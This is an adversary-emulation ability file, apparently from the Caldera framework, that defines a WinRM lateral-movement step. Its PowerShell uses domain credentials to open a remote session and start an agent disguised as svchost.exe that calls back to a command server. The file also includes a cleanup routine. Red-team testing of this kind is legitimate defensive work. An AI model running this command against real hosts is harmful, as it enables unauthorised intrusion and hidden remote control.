41bb2b7a-75af-49fd-bd15-6c827df25921.yml

- id: 41bb2b7a-75af-49fd-bd15-6c827df25921
  name: Start Agent (WinRM)
  description: Start Agent using WinRM (WinRM)
  tactic: lateral-movement
  technique:
    attack_id: T1021.006
    name: "Remote Services: Windows Remote Management"
  platforms:
    windows:
      psh:
        command: |
          $username = "#{domain.user.name}";
          $password = "#{domain.user.password}";
          $secstr = New-Object -TypeName System.Security.SecureString;
          $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
          $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
          $session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
          Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} }};
          Start-Sleep -s 5;
          Remove-PSSession -Session $session;
        cleanup: |
          $username = "#{domain.user.name}";
          $password = "#{domain.user.password}";
          $secstr = New-Object -TypeName System.Security.SecureString;
          $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
          $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
          $session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
          Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{Get-Process cmd | Where-Object Path -eq C:\Users\Public\svchost.exe | Stop-Process}};
          Start-Sleep -s 5;
          Remove-PSSession -Session $session;
        payloads:
        - sandcat.go-windows
  singleton: True